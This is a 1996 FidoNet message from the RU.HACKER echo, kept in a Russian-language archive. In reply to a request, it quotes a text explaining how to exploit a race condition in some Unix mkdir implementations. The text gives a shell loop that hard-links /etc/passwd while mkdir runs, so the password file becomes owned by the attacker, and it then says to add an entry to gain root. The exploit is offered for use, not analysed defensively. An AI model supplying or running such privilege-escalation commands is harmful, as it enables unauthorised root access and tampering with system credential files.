Это - достаточно беспорядочный архив сообщений конференций сети fidonet, которые на момент их прочтения мной
показались полезными или интересными. Многие устарели, многие узкоспецифичны и малоинтересны, но может оказаться и что-то новое...
- __techs (2:5015/42) ----------------------------------------------- __techs - Msg : 63 of 1000 Scn From : Egor Egorov 2:463/1161 14 Jul 96 14:45:00 To : All 16 Jul 96 00:26:12 Subj : Unix passwd ------------------------------------------------------------------------------- @AREA:RU.HACKER hi, All! 14 Jun 96 03:59, Alex Luchkin wrote to Mike Shirobokov: aj>>> ps. люди, pls, только не спугните :-) MS>> не спугнем. тогда он может тебе пpо race condition pасскажет. AL> А расскажите. Или доку бросьте. === Cut === Some Unix system's mkdir (MaKe DIRectory) command can be subverted into aiding you in gaining root. This is done by exploiting a race condition that can occur between processes. The following command script will eventually cause the error to occur and cause the password file to be owned by you: while : ; do nice -10 (mkdir a;rm -fr a) & (rm -fr a; ln /etc/passwd a) & done The race condition happens when the "ln" command runs while the mkdir command is in the middle of running. This works because the mkdir does its job by doing the two system calls: mknod and then chown. If the now inode (allocated by mknod) is replaced with a link to the password file before the chown system call is made, then the password file is "chown"ed instead. To become root from here, all you have to do is add a new entry into the password file. === Cut === AL> Cheerio!~Alex Egor Egorov, 2:463/1161. E-mail: egor@fastware.kiev.ua --- Shit v.2.50 * Origin: KLLJ FastWare Group (2:463/1161)
